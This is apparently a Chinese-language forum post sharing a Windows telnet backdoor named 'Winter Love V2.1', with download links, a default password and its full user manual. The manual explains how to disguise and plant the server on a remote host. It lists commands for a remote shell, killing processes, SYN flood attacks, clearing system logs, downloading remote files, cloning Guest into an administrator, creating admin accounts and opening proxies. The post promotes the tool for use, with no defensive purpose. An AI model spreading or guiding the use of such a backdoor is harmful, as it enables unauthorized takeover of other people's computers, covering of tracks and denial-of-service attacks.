一个功能强大的服务级后门
近来。一个叫特南克斯的小子写了个 类似与wineggdrop的
telnet 后门,功能强大,运行稳定,
而且比wineggdrop的操作更简单方便,是界面式配置
我用过之后觉得很爽 在这里贴出来共享给大家
如果大家想要的话 可以到那小子的个人主页上去下载
个人主页:http://plunix.126.cn
或者可以直接下载:http://leun.web11.bootchina.com/down/winterlove2.1.rar
这里不多说了
下面是它的说明书:
冬日之恋 V2.1 测试版
程序说明:一个扩展型的telnet后门程序
使用说明:
用户必须先用配置端程序生成服务端 server.exe 生成后可以任意改名字
比如我喜欢:wsocket.exe
然后把 wsocket.exe 上传到远程主机上直接运行。
确保已经运行后,就可以打开自己的cmd输入telnet ip 后门端口 就可以连接到对方的主机。
例如: telnet 127.0.0.1 3043
Need Password:plunix
*************welcome to winter love**************
---[ winter love V2.0 DIY version ]---
---[ HomePage: http://plunix.126.cn ]---
Current Directory:C:\WINNT\system32
? for Help
[plunix@root]# (大功告成,在这里就可以任意操纵主机了)
功能说明
1.shell 功能:得到一个Cmd Shell
用法:shell
2.ps 功能:列举系统所有进程
用法:ps
3.kp 功能:杀掉所指定的进程 注意:其要求用户输入进程的ID,所以必须要
ps命令查看进程的ID
用法:kp
4.pss 功能:列举系统所有服务
用法:Logoff
5.ks 功能:杀掉所指定的服务 注意:其要求用户输入服务名,所以必须要用
pss列举服务名。
用法:pss
6.startftp 功能说明:开启FTP服务 注意:在配置程序上的FTP路径必须设置完整路径!比如:C:\MyFtp
开启服务会自动创建文件夹MyFtp,否则会出现内存不能为READ而终止进程的
用法:startftp
7.stopftp 功能:停止FTP服务
用法:stopftp
8.starthttp 功能:开启HTTP代理服务
用法:starthttp
9.startsock5 功能:开启sock5代理服务 注意:其要求输入代理端口。默认是8080
用法:startsock5
10.stopsock5 功能:停止sock5代理服务
用法:stopsock5
11.syn 功能:SYN FLOOD 洪水攻击 注意:其要求用户输入要攻击的IP,攻击的
端口,攻击时间(分钟)。
用法:syn
12.getip 功能:显示当前主机的所有IP地址,包括内网地址
用法:getip
13.clean 功能:清除系统日志文件。
用法: clean
14.info 功能:得到系统信息
用法:info
15.http://ip/文件名 功能:下载程序
用法:http://11.11.11.11/a.exe
用法:http://www.mysite.com/a.exe
用法: http://www.mysite.com:81/a.exe
16.opents 功能:在没有安装终端服务的win 2k服务版的系统中安装终端服务,重启 系统后才生效 注意:其要求用户输入 自定义的终端端口
用法:opents
再输入 12345 (重启后终端会打开12345这个端口)
17.closets 功能:关闭终端
18.sendfile 功能:在客户端与主机之间收发文件 注意:其要求用户输入临时传输文
件的端口(没有默认端口)而且必须要用到客户端程序
用法:sendfile
19.starttln 功能:开启TELNET服务
用法:starttln
20.stoptln 功能:停止TELNET服务
用法:stoptln
21.clone 功能:把Guest克隆成管理员。克隆成功后 Guset 的密码为plunix
用法:clone
22.admin 功能:创建管理员帐号 注意:其要求用户输入 创建的帐号密码
用法:admin
23.remove 功能:完全卸载后门
用法:remove
系统重启与关闭的功能封装与CMD shell 里面,所以必须先得到一个CMD shell
重启命令:restart
关闭命令:shutdown
例如:[plunix@root]#shell
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\winnt\system32>restart (重启)
C:\winnt\system32>shutdown (关闭) |
